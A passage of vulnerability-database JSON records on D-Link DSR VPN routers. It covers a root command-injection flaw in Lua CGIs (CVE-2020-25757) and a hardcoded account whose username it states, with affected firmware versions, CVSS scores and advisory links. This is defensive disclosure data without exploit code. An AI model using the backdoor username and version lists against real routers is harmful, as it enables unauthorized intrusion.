                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500ac_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500ac:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:dlink:dsr-500ac_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:dlink:dsr-500ac:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000ac_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000ac:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000ac_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000ac:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25757"
      }
    ]
  },
  "cve": "CVE-2020-25757",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 8.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 6.5,
            "id": "CVE-2020-25757",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.8,
            "userInteractionRequired": false,
            "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.8,
            "id": "CVE-2020-25757",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Adjacent Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 8.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2020-25757",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-25757",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202012-1107",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25757"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1107"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A lack of input validation and access controls in Lua CGIs on D-Link DSR VPN routers may result in arbitrary input being passed to system command APIs, resulting in arbitrary command execution with root privileges. This affects DSR-150, DSR-250, DSR-500, and DSR-1000AC with firmware 3.14 and 3.17. Multiple D-Link routers contain OS command injection and input validation vulnerabilities. Information may be obtained or tampered with, and a denial-of-service (DoS) condition may be caused.",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25757"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ],
    "trust": 1.62
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-25757",
        "trust": 2.4
      },
      {
        "db": "DLINK",
        "id": "SAP10195",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014726",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1107",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25757"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1107"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ]
  },
  "id": "VAR-202012-0331",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.5056818
  },
  "last_update_date": "2021-12-17T04:57:47.164000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Unauthenticated\u00a0\u0026\u00a0Authenticated\u00a0Command\u00a0Injection\u00a0Vulnerabilities",
        "trust": 0.8,
        "url": "https://www.dlink.com/en/security-bulletin"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-20",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-78",
        "trust": 1.0
      },
      {
        "problemtype": "Improper input validation (CWE-20) [NVD Evaluation ]",
        "trust": 0.8
      },
      {
        "problemtype": "OS Command injection (CWE-78) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25757"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.6,
        "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10195"
      },
      {
        "trust": 1.6,
        "url": "https://www.dlink.com/en/security-bulletin"
      },
      {
        "trust": 1.6,
        "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25757"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25757"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1107"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-25757"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1107"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-12-15T20:15:00",
        "db": "NVD",
        "id": "CVE-2020-25757"
      },
      {
        "date": "2020-12-15T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-1107"
      },
      {
        "date": "2021-08-27T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-07-21T11:39:00",
        "db": "NVD",
        "id": "CVE-2020-25757"
      },
      {
        "date": "2020-12-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-1107"
      },
      {
        "date": "2021-08-27T08:23:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote or local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1107"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "OS command injection vulnerability in multiple D-Link routers",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1107"
      }
    ],
    "trust": 0.6
  }
}

var-201312-0289
Vulnerability from variot

D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username. The firmware of multiple D-Link router products contains a hard-coded account with the user name gkJ9232xXyruTRmY, through which access rights can be obtained. A third party may obtain access rights by using knowledge of the user name. D-Link DSR is a wireless service router product developed by D-Link. D-Link DSR Router Series are prone to a security-bypass vulnerability. A trust management vulnerability exists in several D-Link products. The vulnerability stems from the fact that the program has a hard-coded user account named 'gkJ9232xXyruTRmY'. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201312-0289",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b31"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "model": "dsr-250n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b39"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b31"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b53"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b50"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b53"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "model": "dsr-250",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b39"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b50"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b35"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "model": "dsr-150",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b29"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b20"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b20"
      },
      {
        "model": "dsr-1000n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "model": "dsr-150n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b50"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b56"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b56"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "model": "dsr-1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "model": "dsr-500",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b29"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b46"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "model": "dsr-150n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b48"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b46"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b46"
      },
      {
        "model": "dsr-500n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "model": "dsr-1000",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "model": "dsr-1000n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "model": "dsr-150",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "model": "dsr-150n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.05b64"
      },
      {
        "model": "dsr-250",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "model": "dsr-250n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "model": "dsr-500",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "model": "dsr-500n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "model": "dsr-150 v1.08b44",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.02b11"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.02b25"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b36"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b23"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b27"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.04b58"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.06b43"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.01b50"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b12"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b43"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-150n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-500n 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
